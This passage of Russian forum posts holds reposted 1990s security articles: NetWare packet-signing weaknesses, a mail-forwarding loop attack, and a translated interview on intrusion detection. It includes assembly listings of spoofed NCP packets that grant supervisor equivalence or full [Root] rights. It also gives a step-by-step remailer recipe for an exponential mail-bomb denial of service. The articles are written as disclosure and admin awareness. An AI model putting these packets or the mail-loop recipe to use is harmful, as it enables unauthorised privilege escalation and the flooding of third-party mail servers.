теме безопасности NetWare, можно найти в глобальной сети Internet. Например, по адресу: <a href="http://www.tsu.ru/~eugene/," rel="nofollow" target="_blank">http://www.tsu.ru/~eugene/,</a> вы найдете и эти программы, и список некоторых адресов, посвященных защите сетей Novell NetWare. Но помните: программой, подобной chknull, можете воспользоваться не только вы, как администратор, но и те, кто хочет получить несанкционированный доступ в вашу сеть.</p> <p>ПОДПИСЬ ПАКЕТОВ<br />Начиная с версии 3.11 Novell улучшила систему безопасности NetWare за счет введения подписей пакетов (сигнатур). Для каждого пакета создается уникальная сигнатура, которую очень сложно подделать при посылке чужого NCP-пакета. Подпись представляет собой 8 байт, дописываемые в конец пакета. При приеме пакета сервер анализирует сигнатуру на предмет того, что пакет пришел именно от нужного сервера или станции и не был подставлен третьей стороной. С версии 3.12 и выше подпись стала частью системы.</p> <p>Подпись пакетов имеет четыре уровня защиты (от 0 до 3). К примеру, при минимальном (нулевом) уровне защиты сервер не подпишет пакеты, даже если этого требует рабочая станция. Первый уровень предполагает, что сервер будет использовать подпись только по требованию рабочей станции. При втором уровне сервер &quot;попросит&quot; станцию включить подпись, и если та этого сделать не сможет, то обмен пакетами будет осуществляться без подписи; в том случае, если на сервере поставлен максимальный уровень (третий), то работать без подписи пакетов он не будет.</p> <p>Теоретически сигнатура обеспечивает относительно безопасную работу в сети. Правда, злоумышленник по-прежнему имеет возможность просто следить за проходящей мимо информацией и даже сделать копию большей ее части.</p> <p>При всей кажущейся выгоде использования подписи пакетов существуют некоторые проблемы.</p> <p>В документации Novell по подписи пакетов присутствует фраза, которая по-русски звучит следующим образом: &quot;Если у вас слишком медленно работает сеть или вы вообще не можете подсоединиться к серверу, убедитесь в том, что на рабочей станции отключена подпись пакетов и на сервере поставлена 1-я сигнатура&quot;. </p> <p>На практике, при использовании подписей пакетов, скорость работы в сети может снизиться на 10-200% (это зависит от конфигурации рабочих станций, сервера и сети), поэтому большинство администраторов сетей предпочитают вообще не ставить подпись или ставить ее только на своем компьютере (правда, потом обидно становится - все работают быстро, а сам медленно...).</p> <p>Если у вас на сервере стоит поддержка протокола NetBIOS, то следует знать, что он не защищен подписью пакетов, т. к. инкапсулируется в IPX и пока не поддерживает NCP.</p> <p>Существует еще ряд пакетов, не подписываемых сигнатурой. Например, при удаленной загрузке рабочих станций подпись пакетов не применяется, и, следовательно, можно сделать так, что станция загрузится не с сервера, а с другого компьютера. Если данный компьютер стоит в том же сегменте сети, что и рабочая станция, то сделать это не составит большого труда, а если в другом, то несколько сложнее, но все же возможно. После такой загрузки пользователь подсоединится к настоящему серверу и не заметит, что пароль, который он набирал, уже записан к кому-то на диск или в записную книжку...</p> <p>Еще один тип пакетов, не имеющих подписи, - SPX. Это протокол передачи данных с гарантированной доставкой пакетов. Пакеты SPX передаются по протоколу IPX. Данный протокол используется некоторыми приложениями, например программой rconsole, позволяющей получить удаленный доступ к консоли сервера. По поводу этой программы в сети Internet уже было много дискуссий. Дело в том, что пароль доступа к консоли передается открыто и никак не шифруется. Следовательно, перехватив поток данных между компьютером администратора сети и сервером, можно получить и этот пароль, которого, вполне вероятно, будет достаточно для последующего получения прав на всю систему в целом.</p> <p>ДРУГИЕ АСПЕКТЫ БЕЗОПАСНОСТИ<br />Функция disconnect, обрывающая связь сервера с клиентом с помощью всего лишь одного пакета, также осталась незащищенной. Любой пользователь сети может незаметно &quot;выкинуть&quot; другого (даже администратора) и наслаждаться сделанной мелкой пакостью, а иногда и не мелкой (например, если в это время шел процесс резервного сохранения данных).</p> <p>В заключение статьи хотелось бы сказать несколько слов о паролях в сетях NetWare. Дело в том, что узнать пароль можно только лишь при определенных условиях с помощью программы-перехватчика, которая запоминает комбинацию клавиш. Тех, кто думает, что пароль посылается по сети (а таких немало), спешим разочаровать: в NetWare этот недостаток свойственен только программам доступа к консоли сервера NetWare и регистрации пользователей Macintosh. Следовательно, заботой администратора в данной области защиты является периодическая проверка на наличие паролей.</p> <p>Многие из старых ошибок уже не актуальны в последней версии IntranetWare, но в России эта система пока не получила такого распространения, как NetWare 3.x или NetWare 4.1. Многие сетевые администраторы не хотят переходить на новую систему либо по причине ее кажущейся сложности (хотя это далеко не так), либо по причине отсутствия средств, но не самое ли лучшее вложение денег - в будущую стабильность и надежность? <br /><br /> </p> <p>РАСПЕЧАТКА 1 - ФОРМАТ ПАКЕТА ДЛЯ ПОЛУЧЕНИЯ ПОЛНОМОЧИЙ<br />; ------------------------ уровень Ethernet ---------------------<br />&#160; &#160; &#160; &#160;db -1,-1,-1,-1,-1,-1&#160; &#160; &#160; &#160; &#160; &#160; &#160;; Адрес получателя<br />&#160; &#160; &#160; &#160;db 00,20h,0afh,089h,022h,0afh&#160; &#160; &#160;; Адрес отправителя<br />&#160; &#160; &#160; &#160;db 01,48h&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;; Длина пакета<br />; ---------------------- Заголовок пакета IPX -------------------<br />&#160; &#160; &#160; &#160;dw 0ffffh<br />&#160; &#160; &#160; &#160;db 01,47h&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;; Длина IPX-пакета<br />&#160; &#160; &#160; &#160;db 0<br />&#160; &#160; &#160; &#160;db 17<br />&#160; &#160; &#160; &#160;db ?,?,?,?&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ; Сеть получателя<br />&#160; &#160; &#160; &#160;db 0,0,0,0,0,1&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;; Адрес получателя<br />&#160; &#160; &#160; &#160;db 04,51h&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;; Сокет получателя<br />&#160; &#160; &#160; &#160;db ?,?,?,?&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ; Сеть отправителя<br />&#160; &#160; &#160; &#160;db ?,?,?,?,?,?&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ; Адрес отправителя<br />&#160; &#160; &#160; &#160;db ?,?&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ; Сокет отправителя<br />; ---------------------- Заголовок NCP --------------------------<br />&#160; &#160; &#160; &#160;db 22h,22h<br />&#160; &#160; &#160; &#160;db 48&#160; &#160; &#160; &#160; &#160; &#160; ;(0-256)&#160; &#160; &#160; &#160; &#160; ; Порядковый номер<br />&#160; &#160; &#160; &#160;db 24&#160; &#160; &#160; &#160; &#160; &#160; ;(подставляется)&#160; &#160;; Номер соединения<br />&#160; &#160; &#160; &#160;db 4<br />&#160; &#160; &#160; &#160;db 0<br />&#160; &#160; &#160; &#160;db 68h<br />&#160; &#160; &#160; &#160;db 2<br />; ------------------------- Данные NCP --------------------------<br />&#160; &#160; &#160; &#160;dd -1<br />&#160; &#160; &#160; &#160;dd 514<br />S1_2:&#160; dd offset S1_1 - offset S1_2-4<br />&#160; &#160; &#160; &#160;dd 0<br />&#160; &#160; &#160; &#160;dd 9<br />&#160; &#160; &#160; &#160;dd 0<br />&#160; &#160; &#160; &#160;dd 0<br />&#160; &#160; &#160; &#160;dd 0<br />SUP_ID: db 67h,02h,00,06h&#160; &#160; &#160; &#160; &#160; &#160; ; Идентификатор супервизора<br />&#160; &#160; &#160; &#160;dd 1<br />&#160; &#160; &#160; &#160;dd 5<br />&#160; &#160; &#160; &#160;dd 34<br />&#160; &#160; &#160; &#160;db 'E',0,'q',0,'u',0,'i',0,'v',0,'a',0,'l',0,'e',0<br />&#160; &#160; &#160; &#160;db 'n',0,'t',0,' ',0,'T',0,'o',0,' ',0,'M',0,'e',0<br />&#160; &#160; &#160; &#160;dd 0<br />&#160; &#160; &#160; &#160;dd 1<br />; Имя пользователя (каждый символ в формате - 'символ,0') и его длина :<br />&#160; &#160; &#160; &#160;dd 8<br />&#160; &#160; &#160; &#160;db '3',0,'1',0,'0',0,'7',0<br />S1_1:</p> <p>--------------------------------------------------------------------------------</p> <p>РАСПЕЧАТКА 2 - ДАННЫЕ NCP-ПАКЕТА ДЛЯ ПОЛУЧЕНИЯ ПОЛНОМОЧИЙ В СЕТИ NETWARE 4.X<br />; -------------------Данные NCP - Уровень NDS -------------------<br />&#160; &#160; &#160; &#160; &#160; &#160; dd -1<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 514<br />So_2:&#160; &#160; &#160; &#160;dd offset So_1 - offset So_2+2 ; Длина сообщения<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 9<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 0<br />ID&#160; &#160; &#160; &#160; &#160; db ?,?,?,?&#160; ;ID of [Root] <br />&#160; &#160; &#160; &#160; &#160; &#160; dd 1<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 2<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 8<br />&#160; &#160; &#160; &#160; &#160; &#160; db 'A',0,'C',0,'L',0,0,0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 1<br />So_3:&#160; &#160; &#160; &#160;dd So_1-So_3 ;Длина ACL<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 30<br />&#160; &#160; &#160; &#160; &#160; &#160; db '[',0,'E',0,'n',0,'t',0,'r',0,'y',0,' ',0<br />&#160; &#160; &#160; &#160; &#160; &#160; db 'R',0,'i',0,'g',0,'h',0,'t',0,'s',0,']',0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 0<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 26&#160; &#160; ;Длина полного имени<br />So_1:&#160; &#160; &#160; &#160;db '3',0,'1',0,'0',0,'7',0,'.',0,'I',0,'N',0,'F',0<br />&#160; &#160; &#160; &#160; &#160; &#160; db '.',0,'T',0,'S',0,'U',0&#160; &#160; &#160; &#160; &#160;<br />&#160; &#160; &#160; &#160; &#160; &#160; dd 1Fh&#160; &#160; ;Все права</p> mybb@mybb.ru (2525) Sun, 16 Dec 2007 18:21:19 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=37#p37 https://viktoro2007.apbb.ru/viewtopic.php?pid=36#p36 <p>&quot;Благими намерениями <br />дорога в Ад вымощена&quot; <br />Стало пословицей. </p> <p>Кратко смысл данной статьи можно выразить так: существующие службы (анонимных) почтовых пересылок ( часто называемых римейлингом или форвардингом) за счёт совместных недоработок открывают путь для тупейшей атаки на отказ произвольного почтового ящика/сервера с небольшими ресурсами и ... самих себя! Хуже всего то, что методика, описанная ниже, по силам и &quot;чайнику&quot;( правда, последнего потом, ещё можно найти). Кстати и сам автор специализируется совсем в другой области. </p> <p>Атака описана на примере использования почтовых служб mail.ru, hotmail.ru и анонимного римейлера remailer@replay.com. Все имена (кроме анонима и хостов почтовых серверов) разумеется изменены. Атакуемый объект принадлежал лично автору. </p> <p>Кто хорошо знаком с системами римейлинга/форвардинга может пропустить первые два раздела. </p> <p>1. Первые нехорошие мысли (легальные)<br />На эту идею автор натолкнулся, используя бесплатные мейл-сервера для обеспечения рассылок почты по нескольким филиалам. </p> <p>Проще говоря, я использовал систему пересылки почты сервера mail.ru, указывая в поле пересылки созданного почтового ящика e-mail'ы семи или восьми филиалов. Таким образом при рассылке 200 килобайтного письма экономился примерно 1 Mb трафика. Со временем число филиалов выросло, возникла необходимость объединить их в группы. Система рассылки стала иерархической, примерно такой: <br />group1@ ... :( пять адресов) <br />group2@ ... : ( три адреса) <br />group3@ ... : ( семь адресов) <br />all_group@ ... : (три_адреса: group1, group2, group3) </p> <p>Возможность пересылки на несколько адресов сразу предлагают очень немного почтовых серверов, в частности mail.ru. Надо отметить также, что этот сервер сразу отказывался принимать список для пересылки, когда по ошибке в нём два раза повторялся один и тот же адрес. Более того, если адреса в группах пересекались, то всё равно отсылался лишь один экземпляр письма! Молодцы. </p> <p>Естественно, начал мучить вопрос, а что будет, если подставить рекурсивную ссылку, например в адреса для какой-нибудь группы поставить адрес её самой или &quot;all_group&quot;. </p> <p>2. Вторые нехорошие мысли (наивные).<br />Почитав литературу, быстро убедился, что ничего не произойдёт, нормальные сервера пересылки вставляют в заголовок характерную строчку, позволяющую им избежать зацикливания, по схеме: А пересылает на Б, Б на А. При повторном получении того-же письма оно будет уничтожено, обычно без отсылки извещения. </p> <p>Иначе открылась бы перспектива &quot;случайно&quot; загрузить сервера огромным количеством бессмысленной работы. Пусть, например, А пересылает на (B,C) B - на (A,C) C - (А, Б). Нетрудно увидеть, что эта схема приводит к экспоненциальному росту количества сообщений в системе. К счастью, думалось мне, подобное развитие событий исключено. </p> <p>Прошёл примерно год ... Все чаще на наши адреса стал приходить спам, чьи авторы успешно пользовались анонимными почтовыми службами (типа remailer@replay.com, remailer@anon.egfa.org ) Сети для удаления первоначального адреса письма. Процедура совсем несложная: в заголовке (или начале письма ) пишете строку вида &quot;Anon-To:адреса_получателей&quot;, и отсылаете письмо на remailer@replay.com . В указанные почтовые ящики придут письма с обрезанным заголовком. </p> <p>3. Самые нехорошие мысли ( об уголовно-наказуемом ).<br />Постойте-ка, ведь использование анонимных римейлеров( дальше просто - анонимов), позволяет некоторое количество раз обойти ограничение на рекурсивную пересылку. Рассмотрим нашу последнюю схему: А пересылает на (B,C); <br />B - на (A,C); C - (А, Б). </p> <p>В заголовок (начало) письма добавим N строк &quot;Anon-To: A, B, C&quot;. A,B,C пусть пересылают на аноним (R) . </p> <p>Теперь, если послать письмо на A, B или С, то пока R исчерпает все строки Anon-To, и в сети будет гулять 3**N (три в степени N) писем. Для N=100, это порядка 10**48 писем, что где-то на 20 порядков больше, чем число проходящих за день во всём Интернете. Вряд ли, какой сервер выдержит это. А ведь N может быть скажем равным 20, а адрес C - Вашим ( или Вашего врага, или postmaster@kavkaz.org ;-) ). С - получит около 2**21 ( двух миллионов) писем. Если в каждом будет 100 килобайт текста то &quot;выход&quot; составит 200 Gb. Что станет с его сервером и каналом? </p> <p>4. Эксперимент<br />Впрочем, в этой схеме средний аноним накроется где-то на N&gt;10 (они и так-то перегружены), но ведь никто не мешает написать более оптимальную схему, в которой основная нагрузка падает на форвардер. </p> <p>Пример. <br />attack@post - атакуемый объект <br />Mail.ru, hotmail.ru - форвардеры. Второй форвардер необходим т.к. mail.ru не позволит продублировать адрес даже цепочкой внутренних пересылок, а hotmail.ru пересылает только на один адрес. <br />Аноним - remailer@replay.com <br />a_readr@mail.ru пересылает на remailer@replay.com, attack@post и tmp_atck@hotmail.ru [, tmp2_atck@hotmail.ru, tmp3_atck@hotmail.ru ...] </p> <p>tmp_atck@hotmail.ru на attack@post <br />[tmp2_atck@hotmail.ru на attack@post <br />tmp3_atck@hotmail.ru на attack@post <br />...] </p> <p>В начале письма N фрагментов:&quot; <br />:: <br />Anon-To: remailer@replay.com, a_readr@mail.ru <br />&lt;пустая строка&gt; <br />&quot; ( самому себе аноним тоже отсылает). </p> <p>Отсылаем письмо на a_readr@mail.ru. Всё! </p> <p>При N=2 и без дополнительных адресов tmp2_atck , tmp3_atck, ... attack@post - получил 14 писем. С k дополнительными их было бы (2**N-1)*(2+k). Ещё более опасной формой атаки является случай, когда один из форвардеров указывает на несуществующий адрес реального почтового сервера, перегружая последний в целом. Впрочем, это бесконечная тема. </p> <p>5. Мысли о будущем или как защититься. <br />Сразу оговорюсь, что в этой области не силён. Может кто-то и знает/придумает эффективный способ защиты. Пожалуйста поделитесь. </p> <p>От большинства атак на отказ можно защититься грамотной конфигурацией сервера. Описанная же методика, в лучшем случае просто забьёт Ваш почтовый ящик или сервер. К сожалению, от нас здесь мало что зависит. Почти ничего. А вот авторы анонимов могут помочь. Обычным пользователям можно пользоваться почтой с ограниченным размером почтового ящика ( если у Вас ещё сохранились такие &quot;старомодные&quot; провайдеры). Скорее всего упадёт лишь Pop-сервер. Если местные провайдеры уже забыли о такой &quot;услуге&quot;, попробуйте Web - почту типа @netscape.net, с ограниченным почтовым ящиком. Мне кажется, здесь аноним или форвард выйдет из строя гораздо раньше. </p> <p>Можно, конечно поставить фильтр на известные анонимы или форвардеры, но ведь ими пользуются нормальные пользователи. </p> <p>Анонимам же достаточно начать обрабатывать сразу все заголовки &quot;Anon-To&quot;. Рост превратиться в линейный. Это тоже плохо, но уже совсем не смертельно. Ещё лучше обрабатывать только последнюю строчку переадресовки. </p> <p>Разумеется, владельцам подобных анонимов были посланы соответствующие письма, но наверняка они затерялись в жалобах на спаммеров, да и римейлеров в Cети куда больше, чем может найти автор... </p> <p>На 23 сентября 1999 г. пример ещё работал. </p> <p>P.S. Пример специально построен на достаточно медленных или перегруженных серверах, чтобы их нельзя было эффективно использовать для атаки.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 22:04:42 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=36#p36 https://viktoro2007.apbb.ru/viewtopic.php?pid=35#p35 <p>Предисловие переводчика. Это первая публикация на русском языке, посвященная системам обнаружения атак без рекламы каких-либо конкретных продуктов. Рассуждения признанных экспертов в области сетевой безопасности и, в частности, в области обнаружения атак помогают ответить на многие вопросы, задаваемые пользователями. Данный перевод сделан с учетом российской терминологии в области информационной безопасности. Это не дословный перевод, и поэтому данная публикация в некоторых местах может не совпадать с оригиналом. Однако при переводе была сохранена общая идея первоначальной статьи, которая заключалась в том, чтобы рассказать о системах обнаружения атак, о достоинствах и недостатках существующих систем, о направлениях их развития, о том, чего в действительности можно ожидать от этой технологии.</p> <p>Единственное, что можно добавить, в данной публикации ничего не сказано о таких новых направлениях в области обнаружения атак, как применение нечеткой логики и нейросетей.<br /><br /><br /> </p> <p>Что реально можно ожидать от систем обнаружения атак?</p> <p>Маркус Ранум: Системы обнаружения атак достаточно своевременно обнаруживают известные атаки. Не стоит ждать от таких систем обнаружения неизвестных на сегодняшний день атак. Проблема обнаружения чего-то, неизвестного до настоящего момента, является очень трудной и граничит с областью искусственного интеллекта и экспертных систем (однако в этих областях уже достигнуты немалые успехи; особенно с развитием теорий нейронных сетей и нечеткой логики - примечание переводчика). Также не следует ожидать, что системы обнаружения атак способны реагировать на атаки путем нападения. Это очень опасная возможность, так как она означает, что ложная тревога или ложное срабатывание может вызвать реакцию, запрещающую ту или иную услугу или блокирующую доступ в сеть. Проблема с системами обнаружения атак состоит в том, что, многие люди, прочтя Neuromancer Уильяма Гибсона, думают, что системы обнаружения атак действуют подобно интеллектуальному &quot;ICE&quot; (что-то вроде искусственного разума, обеспечивающего защиту информационной системы - примечание переводчика) и могут защитить сети намного эффективнее, чем это может быть на самом деле. Я вижу, что, скорее всего, системы обнаружения атак похожи на антивирусные программы, используемые для поиска вирусов на жестких дисках или в сетях.</p> <p>Ли Саттерфилд: Современные системы обнаружения атак способны контролировать в реальном масштабе времени сеть и деятельность операционной системы, обнаруживать несанкционированные действия, и, автоматически реагировать на них практически в реальном масштабе времени,. Кроме того, системы обнаружения атак могут анализировать текущие события, принимая во внимание уже произошедшие события, что позволяет идентифицировать атаки, разнесенные во времени и тем самым прогнозировать будущие события. Можно ожидать, что технология обнаружения атак позволит намного повысить существующий уровень защищенности, достигаемый &quot;стандартными&quot; средствами, путем управления несанкционированными действиями в реальном масштабе времени. Технология обнаружения атак не решает проблем идентификации/аутентификации, конфиденциальности и т.п., хотя в ближайшем будущем эти механизмы будут интегрированы с системами обнаружения атак.</p> <p>Кристофер Клаус: Развитие систем обнаружения атак требует дальнейших исследований. Нереально ожидать от систем обнаружения атак, что они будут способны подобно межсетевым экранам защитить всех пользователей от всех угроз (спорный пример – прим. переводчика). Развертыванию системы обнаружения атак должно предшествовать несколько шагов, позволяющих собрать дополнительную информацию, внести изменения в настройки сети . Хорошая система автоматизирует многие этапы этого процесса. Многие заказчики думают, что средства защиты, подобные системам обнаружения атак, защитят их от 100% &quot;плохих вещей&quot;. Это не так. В современном мире нет абсолютных средств защиты. Системы обнаружения атак значительно уменьшат вероятность реализации угроз, но и они не совершенны.</p> <p>Девид Карри: При помощи систем обнаружения атак Вы сможете узнать больше относительно того, что происходит в вашей сети. Вы будете способны собирать данные о том, что поступает в вашу сеть из удаленных источников, и использовать эти данные для эффективного применения средств защиты информации. Однако ошибочно думать, что установка систем обнаружения атак решит все ваши проблемы. Вы по-прежнему должны будете иметь комплексную систему информационной безопасности, объединяющую политику безопасности, обучение, тестирование и применение технических средств. Обнаружения атак – только один элемент этой системы.</p> <p>Юджин Спаффорд: Реально ожидать от систем обнаружения атак идентификации в практически реальном режиме времени любых попыток использования известных уязвимостей или несанкционированного исследования вашей внутренней сети. Они также должны следить за попытками перегрузки критичных ресурсов. Наряду с этим, они должны выдавать звуковые предупреждения об атаке, выполнять определенные действия и создавать журнал регистрации событий для последующего анализа.</p> <p>Неразумно ожидать, что системы обнаружения атак будут эффективно идентифицировать неизвестные типы нападений или идентифицировать атаки, разнесенные во времени.</p> <p>Любая существующая или создаваемая система требует периодического контроля и сопровождения технически грамотным специалистом, постоянно дополняющим ее информацией о новых атаках и уязвимостях. Любая система в некоторых случаях будет ложно генерировать тревоги и сообщать о нападениях. Поэтому требуется некто с достаточным пониманием среды функционирования системы обнаружения атак, который может принимать решения, — ложная ли это тревога или произошла реальная атака.</p> <p>Какие наиболее серьезные слабости в существующих коммерчески распространяемых системах?</p> <p>Саттерфилд: Многие продукты управляются локально. Локальное управление системами обнаружения атак, аналогично управлению другими средствами защиты, имеет значительные недостатки, которые, зачастую, проявляются только через некоторое время после развертывания системы. Масштабируемость жизненно важна для эффективного применения системы, особенно в крупных сетях. Вторая проблема – производительность. Большинство коммерческих систем обнаружения атак не может эффективно функционировать даже в сетях Ethernet (10 Мбит/с), не говоря уже о сетях ATM и других более скоростных магистралях.</p> <p>Клаус: Мы столкнулись с двумя основными проблемами. Во-первых, вы должны быть уверены, что ваша система обнаружения атак соответствует вашей сети. А, во-вторых, вы должны ответить на вопрос: &quot;Что делать потом?&quot;. Необходимо настроить приобретенную систему таким образом, чтобы она обнаруживала атаки и распределяла их по приоритетам с учетом специфики вашей сетевой инфраструктуры. Вы не имеете старых версий операционной системы SunOS? Следовательно, вы неуязвимы к атакам типа &quot;UDP Bomb&quot;. Это знание уменьшает вероятность ложных обнаружений. Однако для такой настройки требуется знание топологии сети и сведений об используемом программном и аппаратном обеспечении. Ни одна из современных систем обнаружения атак не проводит такого рода предварительной настройки. Ответ на вопрос &quot;Что делать потом?&quot; также немаловажен. Предположим, что система обнаружения атак сообщает о событии DNS Hostname Overflow. Что это означает? Почему это плохо? Как я должен реагировать в ближайшей и далекой перспективе? Многие современные системы не обеспечивает такой уровень подробности. Кроме этого иногда очень трудно отделить важную информацию от второстепенной. Необходимо иметь немалый опыт в области обнаружения атак, чтобы формализовать его и заложить в систему.</p> <p>Ранум: Самая большая слабость – наличие огромного числа приложений, которые имеют неизвестные уязвимости. Для типичной системы обнаружения атак основной способ определения нападения – проверка на соответствие сигнатуре. Однако, это ограниченное с технической точки зрения решение.</p> <p>Карри: Обнаружение атак в коммерческих системах – все еще новая, неисследованная область. Производители разрабатывают системы в очень быстром темпе. Хотя существуют некоторые очевидные слабости масштабируемости, удаленной модификации и т.п., большинство производителей уже решило эти проблемы в альфа-версиях или в версиях, находящихся в процессе опытной эксплуатации. Имеется только одна, действительно серьезная, на данный момент нерешенная, проблема – база данных сигнатур. Написание модуля слежения для системы обнаружения атак - достаточно простая задача. Для этого необходим хороший алгоритм сопоставления с образцом, организация буферизации данных и эффективные алгоритмы кодирования. Но самый лучший в мире модуль слежения бесполезен без полной, всесторонней базы данных сигнатур атак, которая должна быть очень быстро обновляемой, так как новые атаки и уязвимости обнаруживаются постоянно. Создание такой базы данных требует наличия хорошо осведомленных экспертов, имеющих доступ к большому числу источников информации об атаках. Способность создания и обновления такой базы данных будет главным параметром, по которому будут оцениваться производители систем обнаружения атак в следующие 12-24 месяцев.</p> <p>Спаффорд: Современные производители сосредотачивают свое внимание на обнаружении внешних атак, а не на выработке обобщенного подхода к обнаружению нарушений стратегии защиты. Выработка этого подхода – это область активных исследований в ближайшее время.</p> <p>Имеется ли технология обнаружения атак, которая предпочтительней других?</p> <p>Клаус: Сегодня имеется два основных подхода к построению систем обнаружения атак: анализ пакетов, передаваемых по сети и анализ журналов регистрации операционной системы или приложений. В то время как эти подходы имеют свои сильные и слабые стороны, мы чувствуем, что сетевой подход к обнаружению атак (network-based) более эффективен по двум причинам: реагирование в реальном масштабе времени и более низкая стоимость операций. Системы обнаружения атак, основанные на анализе сетевых пакетов, позволяют среагировать на нападение до того, как атакующий завершит его, тем самым, обеспечивая защиту в реальном масштабе времени. Развертывание системы обнаружения атак на сетевых сегментах более эффективно за счет быстрой инсталляции, а также за счет того, что пользователь не сможет отключить систему и тем самым нарушить защиту периметра.</p> <p>Ранум: Имеется два основных типа систем обнаружения атак: экспертные и сигнализирующие системы. Экспертные системы пытаются анализировать сетевой трафик, &quot;обучаться&quot; на нем и обнаруживать аномалии. Это требует интенсивной работы и трудно реализуемо. Самая большая проблема экспертных систем – генерация большого числа ложных тревог. Такого рода системы для уменьшения числа ложных тревог требует предварительной настройки. Сигнализирующие системы обнаружения атак намного проще и более надежны. Они почти не выдают ложных тревог и не требуют серьезной настройки. Это, своего рода, решение &quot;в лоб&quot;, которое заключается в поиске соответствий некоторому словарю известных нападений. Когда обнаруживается соответствие шаблону, система сигнализирует о нападении. Ни один из этих вариантов не лучше другого. Идеальным вариантом служила бы система, объединяющая в себе оба этих типа. Я предсказываю, что каждый производитель будет пытаться продавать свои системы как экспертные, поскольку сейчас это модно и позволяет получить больше денег.</p> <p>Карри: Сегодня существует два основных подхода, применяемых в коммерческих системах – обнаружение атак на уровне сети (network-based) и на уровне хоста (host-based). Первые системы анализируют сетевой трафик, в то время как вторые – регистрационные журналы. В любом случае, система обнаружения атак ищет известные шаблоны, которые указывают на нападение. Принципиальное преимущество сетевых систем обнаружения атак в том, что они идентифицируют нападения прежде, чем оно достигнет атакуемой системы. Эти системы проще для развертывания на крупных сетях, потому что они не требуют установки на десятки различных платформ. И в заключение, эти системы практически не снижают производительности сети. Системы обнаружения атак на уровне хоста были разработаны для работы под управлением конкретной операционной системы. Используя знание того, как должна себя &quot;вести&quot; операционная система, средства, построенные с учетом этого подхода, иногда могут обнаружить вторжения, пропускаемые сетевыми средствами обнаружения атак. Однако, зачастую, это достигается дорогой ценой, потому что постоянная регистрация, необходимая для выполнения такого рода обнаружения, может снизить производительность защищаемого хоста. Оба эти подхода могут быть применены для защиты вашей организации. Если вы хотите защитить один или несколько узлов, то системы обнаружения атак на уровне хоста могут быть неплохим выбором. Но, если вы хотите защитить все узлы организации, то системы обнаружения атак на уровне сети, вероятно, будут лучшим выбором.</p> <p>Саттерфилд: Имеется ли более предпочтительная технология обнаружения атак? На заре исследований в этой области постоянно проходили большие дебаты о том, какая модель обнаружения атак лучше – &quot;обнаружение аномалий&quot; (anomaly detection) или &quot;обнаружение злоупотреблений&quot; (misuse detection). &quot;Аномальный&quot; подход сосредотачивается на формировании статистической модели нормального поведения пользователей. Отклонение от модели является признаком нападения. Это красиво в теории, но практически нереализуемо. Этот подход страдает тем, что порождает слишком большое число ложных тревог. Второй подход (misuse detection) намного более простой. Ищите известные сигнатуры и бейте тревогу, когда найдете их. Это гораздо более надежно и выполнимо. Именно на этом подходе основаны практически все предлагаемые сегодня на рынке системы обнаружения атак. Сейчас намечаются сдвиги в развитии первого подхода. Я полагаю, что именно комбинация этих двух подходов станет первым шагом в развитии следующего поколения систем обнаружения атак. Я бы предложил термин &quot;сигнатуро-основанное обнаружение аномалий&quot;. Это звучит несколько странно, но возможно именно этот термин будет главенствовать в следующие годы.</p> <p>Спаффорд: Это зависит от того, какова угроза, политика безопасности, уровень защиты, доступность других мер (например, применение межсетевых экранов), вид реагирования и т.п. Например, система, осуществляющая статистический анализ журналов регистрации в поисках аномального поведения, хорошо подходит для обнаружения атак &quot;постфактум&quot;. Такие системы сильно загружают процессор и требуют большого дискового пространства для хранения журналов регистрации и, в принципе, не применимы для высоко критичных систем, работающих в режиме реального времени. Системы, обнаруживающие атаки на основе анализа трафика, прекрасно применимы в системах, в которых наибольшее волнение вызывают внешние нарушители, которые пытаются применять &quot;стандартные&quot; средства поиска уязвимостей. Ни одна из названных систем не решает всех поставленных задач, и имеются свои плюсы и минусы.</p> <p>В каком направлении будут развиваться системы обнаружения атак? Как будут отличаться эти системы от тех, которые являются доступными сегодня?</p> <p>Карри: Я думаю, что решение с одиночным датчиком (модулем слежения), установленным на одном компьютере, являлось лучшим на момент его принятия. Следующий большой шаг – обнаружение распределенных атак путем приема данных от множества датчиков, разнесенных по сети предприятия, и группирование этих данных в единое изображение, отражающее общую картину нападений на сеть (первые такие решения уже стали появляться, например, системы RealSecure или NetRanger - примечание переводчика). Единственный способ делать это сегодня – вручную (с момента публикации появилась первая система, обобщающая данные от систем обнаружения атак и других средств защиты в единую картину, демонстрирующую общий уровень безопасности сети, уже предлагается на рынке. Это система SAFEsuite Decisions компании ISS - примечание переводчика), и я предполагаю, что необходимость в человеческом контроле будет еще нужна в течение некоторого времени. Я думаю, что в течение ближайших 18-24 месяцев произойдет постепенное слияние рынка межсетевых экранов и систем обнаружения атак. Вы будете видеть несколько продуктов, все более или менее взаимозаменяемых в их ядре.</p> <p>Саттерфилд: Технологии обнаружения атак развиваются быстрее молнии. Направление развития – удешевление инфраструктуры. Никто не хочет многотратить на защиту. Состязание в технологиях обнаружения атак будет выиграно теми, кто предложит заказчикам наиболее дешевое решение.</p> <p>Клаус: Будет наблюдаться развитие трех (потенциально находящихся в противоречии) областей: развертывание, технологичность и качество обнаружения атак. В области развертывания мы будем видеть расширение 